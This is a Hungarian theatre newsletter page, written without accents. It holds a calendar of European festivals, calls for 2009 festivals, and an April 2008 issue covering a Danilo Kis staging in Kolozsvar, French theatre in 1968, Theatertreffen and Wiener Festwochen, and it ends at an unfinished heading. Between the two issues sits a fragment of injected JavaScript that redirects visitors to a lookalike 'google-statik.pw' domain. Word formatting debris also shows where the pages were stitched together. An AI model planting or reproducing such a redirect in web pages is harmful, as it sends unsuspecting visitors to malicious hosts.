Az alabbi informaciokkal ahhoz szeretnenk hozzajarulni, hogy az olvasonk elore tudjanak tajekozodni arrol, hogy egy-egy jelentosebb, rendszeresen jelentkezo fesztivalt mikor es hol rendeznek meg. A fesztivalok programjairol folyamatosan kozoljuk a legfrissebb informaciokat.

Januar

Madrid/ Festival Escena Contemporanea

Februar

Februar: Brno / Trialog International Festival of national Theatres

Marcius

Moszkva/ Golden Mask

Moszkva/ International Theatre Festival Csehov

Aprilis

Berlin / Festtage (opera es zenes szinhaz

Moszkva/ Novaja Drama Festival

Krakow/ Cracow Theatrical reminiscences

Majus

Becs/ Wiener Festvochen (majus-junius)

Vratza/ Bulgaria/ Fetival of Small Theatrical Forms

Vijandi /Esztorszag / International Puppetry Festival

Berlin /Theatertreffen Berlin

Thesszaloniki/ Thessaloniki Spring Festival

Porto/ Festival Internacional de teatro de Expressao Iberica (FITEI)

Isztambul/ Istanbul International Theatre Festival (majus-junius)

Junius

Varna/ Varna International Theatre Summer Festival

15-30: Zagrab / Festival of New Theaters Eurokaz

Tallin / Estonian Dance Festival

Aix-en-Provence /Festival International d'art lyrique d'Aix-en-Provence (junius-julius)

Praga/ Summer Shakespeae Festival (junius-szeptember)

Bonn / Biennale Bonn

Julius

Salzburg / Salzburger Festspiele; Sommerszene

Becs / ImPulsTanz (julius-augusztus)

Avignon / Festival d'Avignon

Udine/ Mittelfest

Bayreuth /Bayreuther Festival (julius-augusztus)

Augusztus

Antwerpen/ Theaterfestival Vlaanderen

Helsinki/ Helsinki Festival

Tampere / Tampere International Theatre Festival

Berlin / Tanz im August (augusztus-szeptember)

Amsterdam/ Theater festival van Nederland en Vlaanderen

Edinburgh/ Edinburgh International Festival / Edinburgh Festival Fringe

Szeptember

Szarajevo/ Teaterfest

Pilsen / International Theatre Festival

Cheb/Csehorszag/ International Festival of Theatre for One Actor

Parizs /Festival d'Automne de Paris (szeptember-december)

Dublin/ Dublin Theatre Festival

Vilnius/ International Vilnius Theatre Festival 'Sirenos'

Belgrad/ BITEF

Nyitra/ Divadelna Nitra-Internatiional Theatre Festival

Lausanne/ Festival Interational de la danse de Lausanne

Oktober

Jerevan / High Fest International Theatre festivalt

Tartu / Estonian Theatre Festival

Tbiliszi / Georgian International Festival of Arts

Torun/ Torun International Puppet Theatre Festival

Wroclaw/ International Theatre festival 'Dialog.Wroclaw'

Maribor/ Borstnik Meeting, Slovene Theatre Festival

November

Tallin / Golden Maszk Fesztival-Moszkva-Esztorszag

Eves( idopont megjelolese nelkul)

Vilniius/ New baltic Danse

Podgorica/ FIAT - Festival of International Alternative Theatre

Poznan/ Theatre Festival 'Maski'

Sibiu/ SIBIU International Theatre Festival

London/ Barbican Festival

Biennale:

International Theatre Festival 'Baltoscandal'

Riga/ Homo Novus

Amsterdam/ Hollande Dance fetsival

Stockholm/Swedish Theatre Biannial

Goteborg/ Goteborg Dance and Theatre Festival

Basel/Baseltanzt

Triennale:

Festival Mondial des Theatres de marionnettes (Charleville-Mezieres

Oktober/februar, biennale: Brusszel/ Europalia International - Festival des Arts et de la Culture

6. Felhivas, palyazat, informacio

In. F.o. Ma. T. 2009

Az otodik alkalommal megrendezett International Festival of Making Theatre 2009. julius 5. es 12. kozott lesz Athenban. Az egyhetes kreativ egyuttmukodes alatt a szinhazcsinalok a vilag minden tajarol megoszthatjak tapasztalataikat munkamodszereikrol, es uj otletekkel gazdagodhatnak. A fesztival munkanyelve angol.

Tovabbi informacio: www.toc.gr

Jelentkezesi hatarido: 2009. marcius 31.

Felhivas nemzetkozi szinhazi fesztivalon valo reszvetelre

THEATRE METHODS 09

Az evenkent megrendezett fesztivalt a szloveniai Bovec-ben tartjak 2009. julius 6. es 12. kozott. A Theatre Methods magas szinvonalu szinhazi szakmai fesztival, ami iden a kortars es tradicionalis szinhazi torekvesek kozotti atjarhatosaggal foglalkozik.

Jelenleg eloadas-terveket varnak jelentkezoktol, amely lehet tobbek kozott kulonleges technikai hatteret nem igenylo szinhazi produkcio, workshop, felolvasas, egyeni eloadas.

Tovabbi informacio:

http://www.iugte.com/projects/fest.reg.php

http://www.iugte.com/projects/TM09.php

Felhivas a 13. Nemzetkozi Gorog Dramafesztivalon valo reszvetelre

A 13. Nemzetkozi Gorog Dramafesztival, amit a Nemzetkozi Szinhazi Intezet Ciprusi Kozpontja szervez az Oktatasi es Kulturalis Miniszteriummal valo egyuttmukodesben, 2009. julius 3. es augusztus 3. kozott lesz Cipruson.

Az ITI Ciprusi Kozpontjanak Fesztival Valogato Bizottsaga nemzetkozi szinhazi tarsulatok jelentkezeset varja a tarsulat anyanyelven eloadott antik gorog tragediakkal/komediakkal. Fontos, hogy az eloadas hu legyen az eredeti gorog szinmuhoz (nem adaptaciokat varnak).

Jelentkezesi hatarido: 2008. december vege

Tovabbi informacio:

Neophytos Neophytou

Cyprus Centre of the International Theatre Institute

38 Regaena Str.,

1010 Nicosia

Tel : +357 22674920 / 22671895

Fax : +357 22680822

E-mail : This e-mail address is being protected from spambots. You need JavaScript enabled to view it

Website : www.cyprus-theatre-iti.org

Keszitettek: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
OSZMI-ITI HÍRLEVÉL 2008. április
Normal 0 21 false false false MicrosoftInternetExplorer4

Nagy Andras Lakos Anna

igazgato, OSZMI elnok, ITI Magyar Kozpont


OSZMI-ITI HIRLEVEL 2008/4.

1. Hirek

1.1. Danilo Kis: Borisz Davidovics siremleke - az evad otodik bemutatoja a kolozsvari

szinhazban

1.2. Negyven evvel ezelott tortent: 1968. a francia szinhazban

1.3. A Theatre national de Strasbourg


2. Folyoiratok - vitak, tematikus szamok, konyvajanlo

2.1. Nemet nyelvu szinhazi folyoiratok majusban

2.2. Theatre/Public


3. Fesztivalok

3.1. Theatertreffen

3.2. Wiener Festwochen

3.3. kunsfestivaldesarts

4. Felhivasok

4.1. Instant Acts - az eroszak es a rasszizmus ellen

4.2. Pantheatre (Del-Franciaorszag): workshopok es fesztival

4.3. A Cirque du Soleil meghallgatasa

4.4. Az Essexi Egyetem (Nagy-Britannia) felhivasa

1. HIREK

1.1. Danilo Kis: Borisz Davidovics siremleke - az evad otodik bemutatoja a kolozsvari szinhazban

Szerdan, majus 21-en este 8 orakor kerul sor az idei evad otodik bemutatojara: Danilo Kis: Borisz Davidovics siremleke cimu muvenek magyar nyelvu osbemutatojara a kolozsvari szinhaz nagyszinpadan. A Borisz Davidovics siremleke cimu regenyt maga Danilo Kis alkalmazta szinpadra, a dramat Radics Viktoria forditotta magyarra.
A Borisz Davidovics siremleke cimu szinmu a Nagy Oktoberi Forradalom kirobbanasanak korulmenyeit veszi szemugyre Borisz Davidovics Novszkij szemszogebol. Ez a sarmor es fantaszta, sokkal inkabb kolto, mint forradalmar vagy osszeeskuvo, szembesul a palackbol kiszabaditott Gonosz rettenetes dinamikajaval, es a szovjet titkosrendorseg foglyakent mar semmije nem marad, mint sajat elettortenetenek a vedelme a csekista vizsgalobiroval folytatott, utolso kuzdelmeben.
Nincs meg egy europai iro, aki olyan sokat tudna a kozelmult tortenelmenek legrejtettebb osszefuggeseirol, mint Danilo Kis, az „utolso jugoszlav iro". Nem szerb es nem horvat, holott, Jugoszlaviaban meg igy neveztek, szerbhorvat nyelven irta regenyeit; nem montenegroi, jollehet edesanyja Milica Dragicevic a Montenegro-i Cetinje szulottje; es nem magyar, noha Kiss Ede vasuti felugyelo fiakent Szabadkan szuletett (1935-ben) es kitunoen beszelt magyarul. Meg nem volt otveneves, amikor Nobel-dijra jeloltek. Csak korai halala (1989) akadalyozta meg abban, hogy Del-Kelet-Europa Borgesekent tartsa szamon az egesz vilag.
Az 1967-ben megjelent Borisz Davidovics siremleke cimu muvet Ivo Andric dijjal, Bruno Schulz dijjal tuntettek ki, majd 1988-ban megkapta a nemet Preis des Literaturmagazins-, valamint az olasz Premio di Tevere dijakat. Tobb mint husz nyelvre forditottak le.

Az eloadas rendezoje a horvatorszagi Robert Raponja tobbizben vitt mar szinre kortars horvat dramakat es klasszikus szinmuveket Szloveniaban, Olaszorszagban, Horvatorszagban, Bosznia-Hercegovinaban, Szerbiaban, Montenegroban, Magyarorszagon es Romaniaban.

Borisz Davidovics es Fegyukin vizsgalobiro elkepeszto parharcaban Dimeny Aront es Molnar Leventet lathatjuk. Tovabbi szerepekben: Gyorgyjakab Eniko, Vindis Andrea, Szucs Ervin, Varga Csilla, Skovran Tunde, Peter Hilda, Laczko Vass Robert, Orban Attila, Balla Szabolcs, Bodolai Balazs, Salat Lehel, M. Kantor Melinda, Albert Julia, Gallo Erno, Farkas Lorand, Buzasi Andras, Fogarasi Alpar, Sinko Ferenc.
A rendezo munkatarsai: Visky Andras dramaturg, Carmencita Brojboiu diszlet es jelmeztervezo, Vava Stefanescu koreografus, Massimo Brajkovic zeneszerzo valamint Kovacs Kinga, a dramaturg munkatarsa.

Tovabbi eloadasok: vasarnap, majus 25-en, es penteken, majus 30-an este 8 oratol.
Jegyek elovetelben kaphatok a Kolozsvari Allami Magyar Szinhaz jegypenztaraban. Tel: 0264-593468, nyitvatartas: 10-13; 16.30-18.30.


1.2. Negyven evvel ezelott tortent: 1968. a francia szinhazban

Tobb iras foglalkozik a negyven evvel ezelotti majus francia szinhazi esemenyeivel. Eloszor is arra a kerdesre keresnek valaszt, hogy a negyven evvel ezelotti majus szinhazi esemenyei a farsangi maskara vagy a forradalom korebe tartoznak-e. Abban szinte mindenki egyetert, hogy 68 jelentos hatassal volt a francia szinhaz fejlodesere.

A visszaemlekezesek alkalmaval mindig ugyanazokat a kepeket elevenitik fel: a barikadokat a Guy-Lussac utcaban, a rendorok sorfalat, az ujra megnyilo Sorbonne-t. Mindig sok szo esik a diakokrol, a munkasokrol viszont keves es annal is kevesebb a szineszekrol, a szinhazrol. Pedig a francia szinhazban is fordulatot hozott 1968. Ennek elso, szomoru allomasa ket kiemelkedo szinhazi alkoto bukasa, Jean Vilare es Jean-Louis Barrault-e.

A fiatalok 68 majus 15-en hataroztak el, hogy elfoglaljak az Odeon szinhazat. Bar a francia kulturalis miniszterium ertesult errol a szandekrol, de semmit se tett, hogy megakadalyozza ezt, sot arra kerte a szinhaz igazgatojat, hogy kerulje el az esetleges osszetuzeseket. A Paul Taylor Tarsulat eloadasa utan a fiatalok leirhatatlan zsivaj kozepette foglaltak el az epuletet, leptek el egyszerre haromszazan a szinpadot, hogy Julian Beck es Jean-Jacques Bel tarsasagaban happaningezzenek. Barrault, aki ket evvel korabban bemutatta Jean Genet Paravanok-jat, most ugy erezte, hogy a fiatalsag ellene fordul azzal vadolvan, hogy egy burzsoa szinhazat igazgat. Egy forradalmi bizottsag vette at a hatalmat, kulonbozo akciokat inditottak a muveszek, a muveszeti szakszervezetek es majus 16-an megjelent Daniel Cohn-Bendit is. Masnap a Figaro azzal kommentalta az esemenyeket, hogy „Barrault meghalt." Malraux is, minden magyarazat nelkul magara hagyta a muveszt.

Minderrol kesobb a kovetkezoket irta Barrault: „Ez a hirtelen roham elsodort mindent, es akar akarjuk, akar nem, eletunkben uj fejezetet nyitott"

Az Odeon elfoglalasa junius 14-ig tartott. Barrault es munkatarsai megprobaltak vedeni az epuletet, biztositani a minimalis biztonsagot. Nem teljes sikerrel.

Az Odeon elfoglalasa utan nehany honappal kezdodott a XXIII. Avignoni Fesztival. Kulonfele bizottsagok kertek a fesztival elhalasztasat, de Vilar nem ment bele. „Miert allitanank le a szinhazat, ha a tortenelem mozgasba lendul?" mondta.

Annyit azonban megis tett, hogy a fesztivalt a kulfoldi tarsulatok bemutatasara szoritotta, mivel azt remelte, hogy ezeket az eloadasokat majd nem zavarjak meg. A sztarok: Bejart XX szazad Balettje a Papai Palota udvaran, a Living Theatre a karmelitak kolostoraban. Juliusban azonban valtozott a hangulat, es Gerard Gelas La Paillasse aux seins nus betiltasa csak olaj volt a tuzre. A foter folyamatos vitaforumma valtozott, Vilar „Szinhaz es tarsadalom" cimmel inditott vitat, es arra kerte a resztvevoket, hogy tartsak tiszteletben a velemenykulonbsegeket. Vilar azt remelte, hogy Avignoni Fesztivalt mindennek ellenere egy nagyszeru, hatalmas vitaforumma alakithatja at, es a szamos, nemzetkozi muvesz jelenlete nemzetkozive teszi a fesztivalt. A Living Theatre azonban szinte langba boritotta Avignont, es a helyi lakossag igen rosszul fogadta mindezt. Mindenhonnan zaporoztak a serto szlogenek, mint peldaul: „Vilar, Bejart, Salazar!"

Vilart, akit mindez nagyon megviselt, nehany honappal kesobb a kovetkezoket irta: „Lehet, hogy csupan illuzio az autentikus popularis kultura intezmenye?"

Ahogy Barrault-t, Vilart kifutyultek, elsoportek. Szeptemberben infarktust kapott, harom evvel kesobb meghalt.

Amennyiben az akkori esemenyeket meg akarjuk erteni, Barrault es Vilar szemelyes peldajan tul, a az 1968-as hangulatbol kell kiindulni, ahhoz, hogy valoban rekonstrualjuk a francia szinhazi emberek ontudatra ebredeset. Ez egyben a szinhazi decentralicazio korszaka volt Franciaorszagban. Marie-Ange Rauch-Lepage szerint, aki errol irt tanulmanyt, a 68-as mozgalom valamennyi szinhazat elerte, es ezek egymas utan zartak be. A TNP szemelyzete elfoglalta a Chaillot szinhazat, tobb muvesz uzemekbe ment, hogy pedagogiai, muveszi munkat vegezzen. Ugyanakkor gennevilliers-ben Bernard Sobel nem valtoztatott programjan, Brecht Kivetel es Szabalyat jatszottak, Aubervilliers-ben Gabriel Garran vegyesen ad szorakoztato es elgondolkodtato eloadasokat, es a Studio Theatre de Vitry-ben Jacques Lassalles Majusi rogtonzesek cimmel ad elo szovegmontazst, Shakespearetol Brechtig terjed az idezett szerzok sora.

Majus 21-tol a kozszolgalati szinhazak es kulturhazak igazgatoi osszegyultek a Theatre de la Cite Villeurbanne-ban, es megszovegeztek a „Villeurbanne-i Deklaraciot" , amely arra keresett valaszt, hogyan lehetne bevinni a politikat a szinhazba, hogyan lehet „ledolgozni" a szinhazakban tapasztalhato demokracia-deficitet. Strasbourgban peldaul a szemelyzet azt kovetelte, hogy reszuk lehessen a szinhaz programjanak megalkotasaban, a kulturalis intezmeny iranyitasaban. Az igazgatok azonban szinte mindenutt visszautasitottak az ehhez hasonlo koveteleseket, mert ebben hatalom megosztasanak veszelyet lattak.

Sokan teszik fel a kerdest, hogy a hatvanas-hetvenes evek szinhaza menyiben, milyen mertekben volt kovetkezmenye 68-nak. Tobben velekednek ugy, hogy jo lenne demisztifikalni ezt a kerdest, mivel az 1970 utan hiresse, elismertte valt rendezokben pusztan annyi a kozos, hogy 68-ban voltak husz evesek, de ok elsosorban nem a 68-as szinhazi forrongasbol nottek ki,hanem az egyetemi szinjatszas felol erkeztek, s nem lazadtak a decenralizaciot kepviselo szinhaziak es burokratakkal ellen, nem kerdojeleztek meg a szinhazi intezmenyek letet, nem skandaltak 68 majusanak udito szlogenjeit sem (A kepzeletet a hatalomba; Mielott ujraalkotod a vilagot, alkosd ujra onmagad; Olyan gyakran „gombold ki" az agyad, amilyen gyakran lehuzod a nadragodon a zipzart; Legyetek realistak, koveteljetek a lehetetlent" )

A hetvenes evek fergeteges szinhazi megujulassaban Barrault, nem egyedul, a mobilitasrol almodozott, a szinpad es a nezoter uj viszonyarol, uj szcenikai terrol. Miert ne lehetne szinhazat csinalni egy garazsban, egy sportcsarnokban, egy palyaudvaron vagy egy cirkuszi satorban, kerdezik tobben. 1974-ben Peter Brook birtokba vette az 1952-ben bezart Bouffes du Nord epuletet, Ariane Mnouchkine a Cartoucherie-ben kezdett dolgozni. Ekkoriban sorra nyiltak meg kulvarosokban a szinhazak, jatszohelyek es tartottak kollektiv happeningeket, improvizaciokat. Ekkoriban alakul ki a gondolat es kiserletezes a kulonbozo mufajok vegyitesere is.

68 majusanak esemenyei elinditoi voltak a szinhazrol valo gondolkodasi folyamatnak, de sajnos eppen a francia szinhaz ket ujito egyenisege, Jean Vilar es Jean-Louis Barrault aldozatul esett.


1.3. A Theatre national de Strasbourg

A Theatre national de Strasbourg elodjet 1946-ban alapitottak, es a szinhazi decentralizacio jegyeben 1968-ban alakult ki jelenleg is ervenyes helye, helyzete a francia szinhazi vilagban.

A Theatre national de Chaillot-val, a Comedie Francaise-zel, az Odeon- Theatre de l'Europe-pal, Theatre national de la Colline-nal azonos „polcra" kerult, vagyis orszagos, nemzeti intezmennye valt.

Ami a kulonlegesseget jelente 68 ota, az az, hogy nem csak kisebb meretu allando tarsulattal rendelkezik, hanem az epuleten belul jelentos ranggal biro Szinmuveszeti Akademia is mukodik. 2001 ota nem csak szineszeket kepeznek itt, hanem rendezoket es dramaturgokat is, amely elter a francia hagyomanyoktol.

A szinhaz jelenlegi igazgatoja Stephane Braunschweig, aki 1964-ben szuletett, az Ecole Normale Superieure-on filozofia szakot vegzett. 1987-1990 kozott Antoine Vitez tanitvanya volt a Theatre national de Chaillot-ban mukodo muveszeti iskolaban. 2000 juliusatol vezeti a Theatre national de Strasbourg-ot es a falai kozott mukodo Szinmuveszeti Akademiat.

Braunschweig rendezokent Buchner es Brecht darabjainak rendezesevel hivta fel magara a figyelmet, s azota is elsosorban klasszikus muvek bemutatasa vonzza a leginkabb.

Legujabb rendezeset, Moliere: Tartuffe-jet aprilis vgen mutattak be es majus vegeig jatsszak sajat szinhazukban. A rendezo a kovetkezokeppen foglalja ossze a darabot: „Tartuffe egy olyan ember tortenete, aki nem erzi jol magat a boreben, es talalkozik egy masik emberrel, aki hasonlokeppen erzi magat, es akit konnyen manipulalhat, epen azert, mert o sincs jol.... Mi az a vagy, ami valakit arra osztonoz, hogy egy imposztor karjaiba vesse magat, mi a hazugsag titokzatos csabereje?" Molierere melankoliaja, ami komikumanak forrasa , es amit Braunschweig olyan jol ki tud aknazni.

Junus elejen (5-8) pedig, immar negyedik alkalommal rendezik meg a „Fiatal, europai rendezok fesztivaljat, amelyre nem csak Franciaorszagbol, hanem Belgiumbol, Nemetorszagbol, Svajcbol, Portugaliabol hivnak eloadasokat. Magyarorszagot a Barka Szinhazban bemutatott Frankenstein terv kepviseli, amelyet Mundruczo Kornel irt (Biro Yvette-tel) es rendezett.

2. Folyoiratok - vitak, tematikus szamok

2.1. Nemet nyelvu szinhazi folyoiratok majusban

Theater heute

A szinhazi lap rendes rovatai mellett (mint amilyen az elmult honapban nemet nyelvu szinpadon bemutatott darabok recenzioji, elozetesek es rovid hirek) majusban a berlini Theatertreffen-re koncentral. Osszeallitasaban bemutatja a fesztival versenydarabjait, amelyet egy kritikusokbol allo fuggetlen zsuri nevezett a „szezon leginkabb figyelemre melto darabjai" koze. A lap sajat kritikusait is felkerte, hogy allitsanak ossze egy masik masik valogatast is: ez azokat a produkciokat tartalmazza, amelyeknek lenne helyuk a szinhazi talalkozon, iden azonban megsem kaptak meghivast. A Theater heute majusi szama Hildegard Schmahl szineszno oneletrajzat kozli, aki iden Proszperot jatsza (az egyebkent meghivott) Vihar-ban, amelyet Stefan Pucher rendezett. A dramamellekletben Jonas Hassen Khemiris, sved szarmazasu fiatal dramairo Invasion (Invazio) cimu darabja olvashato.

Ballettanz

Majusban es a nyar elejen kezdodnek a legnagyobb es legismertebb fesztivalok - igy van ez a tancmuveszet teruleten is. Ezert a lap a majusi szamot teljes eheszeben a fesztivaloknak szentelte. Amellett, hogy reszletes hataridonaplot kozol arrol, hol es mikor indulnak a jelentos tancszinhazi fesztivalok, magara a jelensegre is odafigyel. Hasabjain olyan temakat feszeget, mint a Miert rajonganak egyre tobben a tancert? Hogyan mozgatja meg a nezoket a tanc egy fesztival alatt?

Opernwelt

A lap majusi szamaban nem csak a nemet operak szinpadain bemutatott muvekre koncentral. „Kapcsolodas a jelenhez" c. cikkeben a Litvan Allami Opera nagysikeru Boris Godunov rendezeset es Zemlinsky es Ullmann Los Angelesben toltott alkoto idejerol szamol be „Felfedezett hangok" cimen. Retrospektiv c. rovataban a nemreg elhunyt tenorra, Giuseppe di Stefanora emlekeznek, az interjuban pedig Jose Cura, argentin tenor szolal meg. Majusban a franciaorszagi opera all a kozpontban: a lap Parizs, Lyon es Montpellier viragzo operaeleterol kozol reszletes beszamolot.

2.2. Theatre/Public

Theatre/Public 188. szam (marcius) szamaban a kortars szinhaz, drama all a kozeppontban, es konkretabban olyan temaju cikkeket, interjukat kozolnek, amelyek a tortenetek, temak, mesek szempontjabol kozelitik meg a megjelolt targyat.

A szerkesztok (Christine Hamin-Sirejols, Helene Kuntz es Jean-Loup Riviere) ennek megfeleloen osztottak fejezetekre a tanulmanyokat. Az elsoben Jean-Loup Riviere valamint Michel Vinaver cikkei olvashatok, amelyekben azt vizsgaljak, mirol es milyen formaban szolal meg a szinhaz, mitol lesz kortars egy mu, mi befolyasolja a dramairot a tema megvalasztasaban. A masodik fejezetben olvashato cikkek kozeppontjaban az „en" all. Azt allapitjak meg a cikkek szerzoi, hogy sok mai darab foglalkozik a tarsadalom es az egyen tobbnyire zurzavaros viszonyaval. Azt a kerdest is feszegetik, hogy az intimitast bemutato dramaturgia vajon kizarja-e a tarsadalom politikai kritikajat. Az egyik alapos, elemzo tanulmany ebbol a szempontbol vizsgalja Robert Lepage muveszetet. A harmadik fejezet cikkei a „masik" szemelyere koncentralnak, vagyis abbol indulnak ki, hogy a kortars szinhazban folyamatosan jelen van a „masik", azaz az elnyomott, a kikozositett vagy a bunozo figuraja. A negyedik fejezetben pedig az aktualitashoz kotodessel foglalkoznak. Itt olvashato David Lescot kortars francia dramairo cikke „Majdnem dokumentarista drama" cimmel, valamint Helene Kuntz-nak a jugoszlav haboru kapcsan arrol ir, hogyan jelenik meg a tortenelem a mai europai szinhazban.

3. Fesztivalok

3.1. Theatertreffen

Majus 2-18, Berlin

Minden ev majusaban kerul megrendezesre a legjelentosebb nemet szinhazi fesztival, amely szinhazcsinalokat, ujsagirokat es vendegeket vonz a vilag minden tajarol Berlinbe. A Theatertreffen kozponti darabja a „tiz leginkabb figyelemre melto rendezes", amelyet minden evebne egy tiztagu fuggetlen zsuri valogat a szinhazi szezon kozel 400 eloadasabol.

A zsuri iden a kovetkezo eloadasokat valogatta be a versenyprogramba:

  • Michael Thalheimer / Deutsches Theater Berlin
    (Gerhart Hauptmann) Die Ratten
  • Jurgen Gosch / Deutsches Theater Berlin
    (Csehov) Vanya bacsi
  • Armin Petras / schauspielfrankfurt
    Gertrud nach Einar Schleef
  • Sebastian Nubling / schauspielhannover, Deutsches Schauspielhaus in Hamburg und Festival Theaterformen 2007
    (Simon Stephens) Pornographie
  • Stephan Kimmig / Thalia Theater, Hamburg
    (Friedrich Schiller) Maria Stuart
  • Signa Sorensen und Arthur Kostler / Schauspiel Koln
  • Die Erscheinungen der Martha Rubin (Martha Rubin megjelenesei)
    A SIGNA nonstop-performansz-installacioja
  • Thomas Ostermeier / Munchner Kammerspiel
    (R.W. Fassbinder) Die Ehe der Maria Braun (Maria Braun hazassaga)
  • Stefan Pucher / Munchner Kammerspiele
    (William Shakespeare)Vihar
  • Christoph Marthaler / Rote Fabrik Zurich und dieproduktion gmbh
    Platz Mangel (Hely Szuke) - Christoph Marthaler projektje
  • Jan Bosse / Schauspielhaus Zurich
    (William Shakespeare) Hamlet

A szinhazi talalkozo keretprogramja legalabb annyira erdekes, mint kozponti resze: a kultura, politika es gazdasag teruleterol erkezo vendegek szinhazi es aktualis gazdasagpolitikai temak kozotti osszefuggesekre hivjak fel a fiygelmet. Dijatadok, kozonsegtalalkozok, premier partik es koncertek sora disziti tovabb a programot.

„tt Talente" (tt Tehetsegek) cim alatt a Theatertreffen megmutatkozasi lehetoseget biztosit a szinhaz kovetkezo generaciojanak: az 1978-ban letrehozott Stuckemarkt (szindarab-piac) valojaban egy fesztival a fesztivalban, eddig ismeretlen europai alkotok uj darabjaival. A Nemzetkozi Forum es a Fesztivalujsag lehetoseget nyujtanak mind fiatalabb szinhazcsinaloknak illetve kritikusoknak professzionalis tovabbfejlodesukre. A Talententag (Tehetseg Nap) elnevezesu program egesznapos programkent lehetoseget nyujt a felnovo szinhazi generacionak arra, hogy megismerkedjenek egymassal.

Tovabbi informacio a fesztivalrol: www.berlinerfestspiele.de

3.2. Wiener Festwochen

Majus 9-junius 15, Becs

A Becsi Unnepi hetek, kozismertebb neven Wiener Festwochen, meghirdette programjat, amelyet iden 2008. majus 9-junius 15. kozott lathatnak az erdeklodok.

Az fesztival temaja a jovo es a jelen embere.

A zenei programok temaja a kizarolag a kortars europai zenes szinhaz - negy jelentos kortars zeneszerzo, Karlheinz Stockhausen es Hans Werner Henze, George Benjamin elso operaja es a vilaghiru komponista Wolfgang Rihm egy fiatalkori munkaja kerul bemutatasra.

Az interkulturalis parbeszed es kulonbozo varosreszeket bemutato Into the City sorozat immaron harmadszor kerul megrendezesre a Festwochen keretein belul. Iden tobbek kozott budapesti muveszek es kutatok hasonlitjak ossze a ket „Jozsefvaros"-t - Becs es Budapest 8. kerulete ugyanis ugyanazt a nevet viseli.

„Kik voltunk a jovoben?" A festwochen szinhazi programja a jovo szinhazi feladatait, valamint a 20-21. szazadi emlekeket tuzte musorra. Celjuk, hogy a jovo perspektivajaval szemleljuk jelenunket, mely szemleletmod erositi jelenunk es annak fejlodesenek valodi megpillantasat. Ariane Mnouchkine, Luc Bondy, Ivo van Hove, Christoph Marthaler, Alvis Hermanis, Michael Marmarinos lesznek a „beszelgetotarsak". A szinhazi program Europan kivuli szinhazi projekteket is bemutat: a vendegek kozott brazil, del-afrikai, beiruti, new york-i es argentin szinhazcsinalok szerepelnek

A Forum Festwochen a jovo Europajanak pozicioit mutatja be: Tiit Oiasoo demografiai jovonket kerdojelezi meg. Az andcompany&Co. a little red cimu darabjaban a kommunizmus letunt jovoigereteivel foglalkozik. Philippe Quesne rendezo az emberfeletti kihivasok tortenetet tematizalja realis es kepzelt problemak alapjan. Dries Verhoeven, Jetse Batelaan, Massimo Furlan a tovabbi eloadok. Az eloadasok formai valtozatossaga, amelyet ezek a fiatal szinhazcsinalok torteneteikhez talalnak, a virtuoz szinjatszastol az installacioig terjed. Azonban minden darab sugallja azt a maximalis figyelmet, amit ma a fiatalok a vilagnak szentelnek.

Tovabbi informacio a fesztivalrol: www.festwochen.at

3.3. Kunsfestivaldesarts

2008. majus 9-31, Brusszel

A Kunstenfestivaldesarts elnevezesu fesztival elsosorban a frankofon es flamand kiserletezo szinhazmuveszek es kepzomuveszek munkait mutatja be, de a nemzetkozi fesztivalra meghivast kapnak olyan produkciok is, amelyek a nyelvi es vizualis kifejezesmodokkal kiserleteznek.

A fesztival celja, hogy olyan uj munkakat mutasson be, amelyek sajatos vilagnezetukkel felebresztik onmagukban es a nezokben, hogy mas es mas szempontbol szemleljek a latott muveket. A Kunstfestivaldesarts kozmopolita varosi fesztival - az emberek egyre inkabb egy olyan kozosseg tagjaiva valnak, amelyben nemzeti, nyelvi es kulturalis hatarok keresztezik egymast. A varos par excellence a kornyezet, amelyben megfigyelheto a kozmopolita tarsadalom. Brusszel pedig az a varos, ahol Belgium ket legnagyobb kozossege el egyutt. A programot szamos holland es francia nyelvu intezet segiti es tamogatja. Igy az eloadasok is ezen a ket nyelven folynak, ezzel is erositve a kapcsolatot a varos ket kulonbozo kulturaju kozossege kozott.

A fesztivalra minden evben szamos flamand es francia nyelvu eloado kap meghivast. Emellett azonban evrol evre nagy szamban tunnek fel nyugati illetve nem-nyugati eloadomuveszek es tarsulatok.

Az idei fesztivalon Pinter Bela tarsulata Az orult, az orvos, a tanitvanyok es az ordog c. eloadasat jatssza majus 19-23-ig.

Ugyszinten a fesztivalon vendegszerepel a Berlinben elo es alkoto tancos-koreografus Salamon Eszter is, aki Dance 1 cimu alkotasat mutatja be Brusszelben. A koreografusnak ebben a produkciojaban is a kiindulopontja egy olyan, altala kidolgozott technika, amelynek alapja az, ahogy az egyen gondolkodik sajat testerol.

Tovabbi informacio a fesztivalrol: www.kfda.be

4. Felhivasok

4.1. Instant Acts - az eroszak es a rasszizmus ellen

Szineszeket, zeneszeket, tancosokat es akrobatakat keres a berlini szekhelyu Interkunst non-profit egyesulet „Instant Acts - against violence and racism" elnevezesu nemzetkozi szinhazi es zenei projektjehez.

Az Interkunst non-profit szervezet 1990 ota szervez multikulturalis projekteket. Idei felhivasa egy 5 hetes (2008. szeptember - oktobereben jatszando) eloadas turne, melynek temaja az eroszak es rasszizmus elleni megmozdulas. A szervezok 17-27 ev kozotti aktiv muveszek, illetve ket-harom fos csoportok jelentkezeset varjak. A meghivott muveszeknek egy kb. 10 perces rovid darabot kell magukkal vinni a fent nevezett temaban. A turne kezdete elott a kivalasztott muveszek egyutt dolgoznak majd az eloadassorozat kialakitasan, amelyet iskolakban, szinhazakban, templomokban, bortonokben valamint ifjusagi- es kulturalis kozpontokban kerulnek bemutatasra.

Bovebb indormacio es jelentkezes: Interkunst e.V., S-10793 Berlin, Postfach 62 03 62

Telefon: +46 30 781 4001

Web: www.interkunst.de

E-Mail: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

4.2. Pantheatre (Del-Franciaorszag): workshopok es fesztival

Julius 1-13 kozott

A del-franciaorszagi Roy Hart Centre-ben mukodo Pantheatre resztvevoket var nyari nemzetkozi muhelymunkaira. A 2008-as muhelymunkak temaja: „Seherezade es hangja, ma" , amelynek celja muveszeti gyakorlatok es kulturalis temaju tanulmanyok elegyitese.

A reggeli muhelymunkak kozott hangeloadasok (voice performance) lesznek kombinalva koreografusi, zenei szinhazakkal, valamint kezdoknek szolomuhelymunkak is lesznek.

Delutan laboratoriumok, illetve eloadasok lesznek a mitologia es a muveszet temakoreben.

Tovabbi informacio: www.pantheatre.com, Tel: +33 0 4 66 854419


4.3. A Cirque du Soleil meghallgatasa

